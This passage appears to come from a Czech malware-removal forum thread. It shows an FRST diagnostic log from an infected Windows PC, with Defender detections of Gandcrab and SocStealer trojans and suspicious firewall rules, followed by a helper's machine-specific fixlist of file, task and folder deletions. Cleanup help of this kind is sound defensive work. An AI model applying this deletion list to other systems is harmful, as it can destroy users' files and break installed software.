FirewallRules: [UDP Query User{E933777E-BC31-4C33-B9F7-2F06BF87CBAA}C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe] => (Allow) C:\users\megret-tpc\appdata\local\gamecenter\gamecenter.exe
FirewallRules: [{92755B08-09F0-4AF8-A979-0F12AA9FBFB1}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{813C5E84-E232-4735-B441-54105C633201}] => (Allow) C:\Games\World_of_Tanks\WoTLauncher.exe
FirewallRules: [{7C10115A-DB4D-493B-98A9-B045D5BDC9DC}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{AF5F6F56-9A55-4017-A608-489314B2F5D9}] => (Allow) C:\Games\World_of_Tanks\worldoftanks.exe
FirewallRules: [{15E2B108-91EE-41CF-B641-D046D8163340}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{6D3B9992-F3CD-40BF-8441-7CEA3C921370}] => (Allow) C:\steam\Steam.exe
FirewallRules: [{2CA812BC-B82B-45CD-8572-277E5D632EFD}] => (Allow) C:\steam\Steam.exe
FirewallRules: [{2EB35DAB-EAF8-47ED-851B-FE938E3B7985}] => (Allow) C:\steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{E57340DD-B60A-4128-86BE-91652B7847D9}] => (Allow) C:\steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{3C235A18-B5FA-45EB-A9A1-BF654CBAF913}] => (Allow) E:\SteamLibrary\steamapps\common\ARK SOTF\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{567A28E2-777A-41F4-9782-13858C325692}] => (Allow) E:\SteamLibrary\steamapps\common\ARK SOTF\ShooterGame\Binaries\Win64\ShooterGame_BE.exe
FirewallRules: [{F83307F4-C213-4391-A0E7-E858F04E7698}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
FirewallRules: [{4C89096B-6A31-4EBF-BA6E-AFE3D37ECD3A}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B89DDEF6-C334-4413-8CBB-EE162CBA85CF}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{560E5289-67E4-4DEC-AC6E-3023E75056BA}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{A1D55ED3-F823-4E48-9DC4-24C673DCE973}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{0CD643F1-ADE3-4FD6-AD2B-A8935888B1F4}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B54CF621-D2A0-4D6C-8FA4-3D50B141C066}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{6FBC9D66-5B3E-4FA5-8217-42B9E8DFBD3B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{1EBCBEAF-888D-4B86-9D35-8092B1A4D336}] => (Allow) C:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{A6D7E43F-0AB3-45A0-B6DC-FC2EACA56B3C}] => (Allow) C:\steam\bin\cef\cef.win7x64\steamwebhelper.exe
FirewallRules: [{D18A5587-7E6B-438D-937F-16E391A53B77}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{49AD8509-9CA3-4DD0-9B96-410230908DD1}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{311177C2-2B48-42BF-AC13-90EEDA19A0D3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{1CCAE30C-550F-4136-90FA-2E41DCC1F38F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{43497D49-1541-459B-ABC5-709B698D8098}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{019ED680-DDF2-4E20-A64C-E89D1EE6A170}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{D4C7EFC8-901F-430B-AC77-97738E785570}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{C0E1617A-E1BD-42AB-A58B-4754EB9D770C}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{27D58F9D-16EE-4208-B631-AE4754597687}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0ED1EF5A-8302-441C-82B6-B6BD5E81934F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{5D6C0BA3-423F-49E4-A8DE-9AFF54CBCB32}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{7C565C86-3C02-4BC3-B513-103C600D3DCD}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{47F7DCB9-4CD8-45C1-90EB-EC9A1604AA8B}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{35AF049C-B43B-4765-93D1-461C7E435552}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{3076B393-E46B-4712-9AC9-2563D7C64BD2}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2CFB1987-EF73-45DB-99AE-0FD2FBB605C7}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{2BDC570B-1EB0-4385-85C3-FB0C1D22DD61}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{E04F468A-E1A9-4780-AB13-A0A9A4475483}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{80F4BBCA-6100-49FA-8CF7-06D24C7862F6}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{118D8263-F00A-4983-912E-EEFCB66E4AD8}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{0654B5D4-BA52-4D21-B25D-B5D71E9F29E3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FE6F51AA-3BFE-410E-8254-A969258614E5}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{17D9820E-BF95-4D08-95FA-BECFED2E7F82}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{F2A75EED-D282-4C92-8FCF-9EF498A174C5}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7136348D-5089-456D-85D1-3BBE3B6DBEDD}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{D1217ECA-185B-4AA4-94C5-0ECAE3C57D93}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{E05ABCFA-06EA-48E7-BC47-8CBDCF773A51}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe
FirewallRules: [{A1A9908B-5F39-424E-BF61-4711280B12EB}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{B0E03458-6F9D-44C7-8C18-FB6BBDE91114}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe
FirewallRules: [{81567C98-4430-44E0-BB54-E06404F8A3A3}] => (Allow) C:\WINDOWS\SysWOW64\InstallShield\setup.exe

==================== Restore Points =========================

22-10-2018 00:39:02 Instalační služba modulů systému Windows
25-10-2018 05:18:37 Instalační služba modulů systému Windows
26-10-2018 19:57:26 Instalační služba modulů systému Windows
28-10-2018 11:57:17 Instalační služba modulů systému Windows
29-10-2018 17:57:55 Instalační služba modulů systému Windows
30-10-2018 19:09:07 Instalační služba modulů systému Windows
02-11-2018 08:42:24 Instalační služba modulů systému Windows
03-11-2018 10:42:18 Instalační služba modulů systému Windows
04-11-2018 20:42:45 Instalační služba modulů systému Windows
05-11-2018 22:42:28 Instalační služba modulů systému Windows
07-11-2018 22:09:36 Instalační služba modulů systému Windows
08-11-2018 22:43:05 Instalační služba modulů systému Windows
10-11-2018 00:02:03 Operace obnovení

==================== Faulty Device Manager Devices =============

Name: Realtek High Definition Audio
Description: Realtek High Definition Audio
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Realtek
Service: IntcAzAudAddService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: NVIDIA Virtual Audio Device (Wave Extensible) (WDM)
Description: NVIDIA Virtual Audio Device (Wave Extensible) (WDM)
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: NVIDIA
Service: nvvad_WaveExtensible
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: AMD High Definition Audio Device
Description: AMD High Definition Audio Device
Class Guid: {4d36e96c-e325-11ce-bfc1-08002be10318}
Manufacturer: Advanced Micro Devices
Service: AtiHDAudioService
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

==================== Event log errors: =========================

Application errors:
==================
Error: (11/10/2018 04:21:29 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program FRST64.exe verze 8.11.2018.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 1cc8

Čas spuštění: 01d47908e0efb16d

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Users\MeGret-TPC\Desktop\FRST64.exe

ID hlášení: acfa109c-b498-4883-a5af-07618710530e

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (11/10/2018 04:19:41 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program chrome.exe verze 70.0.3538.77 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 1b5c

Čas spuštění: 01d4790893cc359a

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

ID hlášení: c6a75218-624a-41fa-8e8e-1ff21f8ad078

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (11/10/2018 01:05:43 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program AdwCleaner.exe verze 7.2.4.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 1198

Čas spuštění: 01d478ed93f4bf66

Čas ukončení: 5

Cesta k aplikaci: C:\Users\MeGret-TPC\Desktop\AdwCleaner.exe

ID hlášení: 80872c30-faf7-43e2-8d84-1a18cd724194

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (11/10/2018 01:02:43 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: GPUTweakII.exe, verze: 1.1.7.2, časové razítko: 0x56822419
Název chybujícího modulu: Vender.dll, verze: 1.1.2.6, časové razítko: 0x565bb08a
Kód výjimky: 0xc0000005
Posun chyby: 0x0000ec74
ID chybujícího procesu: 0x1d14
Čas spuštění chybující aplikace: 0x01d478ed4918c322
Cesta k chybující aplikaci: C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe
Cesta k chybujícímu modulu: C:\Program Files (x86)\ASUS\GPU TweakII\Vender.dll
ID zprávy: 1466c890-36de-420c-a88c-56f090f183f4
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (11/10/2018 12:58:13 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: rundll32.exe, verze: 10.0.17134.1, časové razítko: 0x1e3f5e34
Název chybujícího modulu: IECache.dll_unloaded, verze: 0.0.0.0, časové razítko: 0x2a425e19
Kód výjimky: 0xc000041d
Posun chyby: 0x00023e48
ID chybujícího procesu: 0x1f70
Čas spuštění chybující aplikace: 0x01d478eca61ca46c
Cesta k chybující aplikaci: C:\Windows\SysWOW64\rundll32.exe
Cesta k chybujícímu modulu: IECache.dll
ID zprávy: 3acf7487-f350-456e-b9c7-0102e914752e
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (11/10/2018 12:58:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: rundll32.exe, verze: 10.0.17134.1, časové razítko: 0x1e3f5e34
Název chybujícího modulu: KERNELBASE.dll, verze: 10.0.17134.165, časové razítko: 0xfa43f4b2
Kód výjimky: 0x0eedfade
Posun chyby: 0x0010ddc2
ID chybujícího procesu: 0x1f70
Čas spuštění chybující aplikace: 0x01d478eca61ca46c
Cesta k chybující aplikaci: C:\Windows\SysWOW64\rundll32.exe
Cesta k chybujícímu modulu: C:\WINDOWS\System32\KERNELBASE.dll
ID zprávy: dda83beb-abfa-48ef-82ab-8460cf862a34
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

Error: (11/10/2018 12:57:16 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program AdwCleaner.exe verze 7.2.4.0 přestal spolupracovat se systémem Windows a byl ukončen. Chcete-li zjistit, zda je k dispozici více informací o tomto problému, vyhledejte historii problému v ovládacím panelu Zabezpečení a údržba.

ID procesu: 1f28

Čas spuštění: 01d478ec6df24fee

Čas ukončení: 4294967295

Cesta k aplikaci: C:\Users\MeGret-TPC\Desktop\AdwCleaner.exe

ID hlášení: d409bece-6a81-4f8a-a836-75de7fa2c8a5

Úplný název balíčku s chybou:

ID aplikace související s balíčkem s chybou:

Error: (11/10/2018 11:53:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Název chybující aplikace: GPUTweakII.exe, verze: 1.1.7.2, časové razítko: 0x56822419
Název chybujícího modulu: Vender.dll, verze: 1.1.2.6, časové razítko: 0x565bb08a
Kód výjimky: 0xc0000005
Posun chyby: 0x0000ec74
ID chybujícího procesu: 0x1d28
Čas spuštění chybující aplikace: 0x01d478e38ff9b652
Cesta k chybující aplikaci: C:\Program Files (x86)\ASUS\GPU TweakII\GPUTweakII.exe
Cesta k chybujícímu modulu: C:\Program Files (x86)\ASUS\GPU TweakII\Vender.dll
ID zprávy: 357165f3-1356-4bd3-bbb2-0f6b0c39a0a1
Úplný název chybujícího balíčku:
ID aplikace související s chybujícím balíčkem:

System errors:
=============
Error: (11/10/2018 04:22:34 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/10/2018 04:22:21 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/10/2018 04:22:15 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/10/2018 04:22:15 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{9E175B6D-F52A-11D8-B9A5-505054503030}

Error: (11/10/2018 04:22:14 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (11/10/2018 04:22:14 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{7D096C5F-AC08-4F1F-BEB7-5C22C517CE39}

Error: (11/10/2018 04:22:11 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby ShellHWDetection s argumenty Není k dispozici za účelem spuštění serveru:
{DD522ACC-F821-461A-A407-50B198B896DC}

Error: (11/10/2018 04:22:04 PM) (Source: DCOM) (EventID: 10005) (User: FRNDA)
Description: Služba DCOM zjistila chybu 1084 při pokusu o spuštění služby WSearch s argumenty Není k dispozici za účelem spuštění serveru:
{E48EDA45-43C6-48E0-9323-A7B2067D9CD5}

Windows Defender:
===================================
Date: 2018-11-10 13:08:08.301
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Fuery.B!cl
ID: 2147718514
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\MeGret-TPC\Favorites\Sec.VPN.ur\041938\urlmon.7z
Původ zjišťování: Místní počítač
Typ zjišťování: FastPath
Zdroj zjišťování: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze podpisu: AV: 1.279.1558.0, AS: 1.279.1558.0, NIS: 1.279.1558.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4

Date: 2018-11-09 20:24:13.372
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Pynamer.A!ac
ID: 2147724878
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\MeGret-TPC\AppData\Local\Temp\554040937\ic-0.a5e74b1d8d35b.exe
Původ zjišťování: Místní počítač
Typ zjišťování: FastPath
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Verze podpisu: AV: 1.279.1512.0, AS: 1.279.1512.0, NIS: 1.279.1512.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4

Date: 2018-11-09 20:24:10.218
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Gandcrab.AF
ID: 2147727324
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\Users\MeGret-TPC\AppData\Local\Temp\553868843\ic-0.ab0ccb5b5e191.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Verze podpisu: AV: 1.279.1512.0, AS: 1.279.1512.0, NIS: 1.279.1512.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4

Date: 2018-11-09 20:22:44.310
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: Trojan:Win32/Skeeyah.A!rfn
ID: 2147694182
Závažnost: Vážné
Kategorie: Trojský kůň
Cesta: file:_C:\ProgramData\kitot\kitot.exe
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Ochrana v reálném čase
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
Verze podpisu: AV: 1.279.1512.0, AS: 1.279.1512.0, NIS: 1.279.1512.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4

Date: 2018-11-08 22:47:12.601
Description:
Prohledávání Antivirová ochrana v programu Windows Defender zjistilo malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanSpy:Win32/SocStealer!rfn
ID: 2147724296
Závažnost: Vážné
Kategorie: Trojský monitorovací software
Cesta: chromeinstall:_HKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\GOOGLE CHROME; file:_C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
Původ zjišťování: Místní počítač
Typ zjišťování: Konkrétní
Zdroj zjišťování: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze podpisu: AV: 1.279.1442.0, AS: 1.279.1442.0, NIS: 1.279.1442.0
Verze modulu: AM: 1.1.15400.4, NIS: 1.1.15400.4

Date: 2018-11-10 16:22:01.920
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2018-11-10 13:00:24.063
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2018-11-10 12:58:54.819
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2018-11-10 11:50:25.924
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

Date: 2018-11-10 11:18:20.921
Description:
Funkce Ochrana v reálném čase u prohledávání Antivirová ochrana v programu Windows Defender zjistila chybu a došlo k jejímu selhání.
Funkce: Při přístupu
Kód chyby: 0x8007043c
Popis chyby: Tuto službu nelze spustit v nouzovém režimu.
Důvod: Antimalwarová ochrana přestala z neznámých důvodů fungovat. V některých případech lze tento problém vyřešit restartováním služby.

CodeIntegrity:
===================================

Date: 2018-11-08 18:23:00.460
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:23:00.451
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:23:00.401
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:23:00.387
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\FlightSettings.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:23:00.375
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\dsreg.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:23:00.367
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\dsreg.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:22:59.916
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

Date: 2018-11-08 18:22:59.893
Description:
Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\aepic.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: AMD Ryzen 5 1600 Six-Core Processor
Percentage of memory in use: 12%
Total physical RAM: 8138.47 MB
Available physical RAM: 7088.88 MB
Total Virtual: 11594.47 MB
Available Virtual: 10749.81 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:232.33 GB) (Free:110.8 GB) NTFS
Drive d: (Rezervováno systémem) (Fixed) (Total:0.49 GB) (Free:0.44 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive e: () (Fixed) (Total:147.73 GB) (Free:28.42 GB) NTFS

\\?\Volume{c2defe55-aa59-439b-a086-79f0d4925f93}\ (Obnovení) (Fixed) (Total:0.44 GB) (Free:0.06 GB) NTFS
\\?\Volume{38d6c9b2-0000-0000-0000-000e25000000}\ () (Fixed) (Total:0.83 GB) (Free:0.45 GB) NTFS
\\?\Volume{44319eeb-f1a7-42db-9a4e-36ce51961691}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Protective MBR) (Size: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 149.1 GB) (Disk ID: 38D6C9B2)
Partition 1: (Active) - (Size=500 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=147.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=849 MB) - (Type=27)

==================== End of Addition.txt ============================

Otevřte poznámkový blok a zkopírujte do něj:

Start

CloseProcesses:
Task: {132D8886-4A07-462A-B824-78AF1B6BF888} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {6783EA1B-F8CB-4EBD-878B-51DDF41C013A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-10-14] (Google Inc.)
Task: {877C1772-9F30-4BE9-8463-5DF5AA19A3D4} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
FirewallRules: [{CFA12342-5A44-4771-94EA-6913D4D30364}] => (Allow) C:\Users\MeGret-TPC\AppData\Local\kAyeMDseXh.exe
FirewallRules: [{88291374-E8D6-4B34-914C-EA8B2AADE13B}] => (Allow) C:\Users\MeGret-TPC\deiefECnJ.exe
C:\ProgramData\kitot
C:\Users\MeGret-TPC\AppData\Local\Temp
C:\Program Files (x86)\Google\Chrome\Application\winmm.dll
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle Corporation)
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {0a26cf40-38e2-11e6-9bc2-806e6f6e6963} - "I:\setup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {6faddee6-cef4-11e8-9c3f-806e6f6e6963} - "D:\DVDSetup.exe"
HKU\S-1-5-21-819675408-2753461327-3771956256-1001\...\MountPoints2: {8b1956be-cef6-11e8-9c42-309c23650ed5} - "E:\Lenovo_Suite.exe"
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\ssv.dll => No File
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\jp2ssv.dll => No File
FF Plugin-x32: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files (x86)\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [No File]
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [No File]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [No File]
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [No File]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [No File]
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxp://search.babylon ... XX9VMNAB90"
C:\WINDOWS\System32\Tasks\{B4B9A496-1465-614B-42E6-E9FACFD9FDCB}
C:\WINDOWS\System32\Tasks\{63FF5D84-F332-3C55-1873-E2C6DE6F96AA}
C:\WINDOWS\System32\Tasks\{36E954AC-8F78-691F-B718-D4CE7E4BCF08}
C:\WINDOWS\AutoKMS
C:\WINDOWS\msdownld.tmp
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
C:\ProgramData\DP45977C.lfl

EmptyTemp:
End

Uložte na plochu jako fixlist.txt. Spusťte znovu FRST a klikněte na >Fix<. Po skončení akce se objeví log, který sem zkopírujte.

Fix result of Farbar Recovery Scan Tool (x64) Version: 08.11.2018
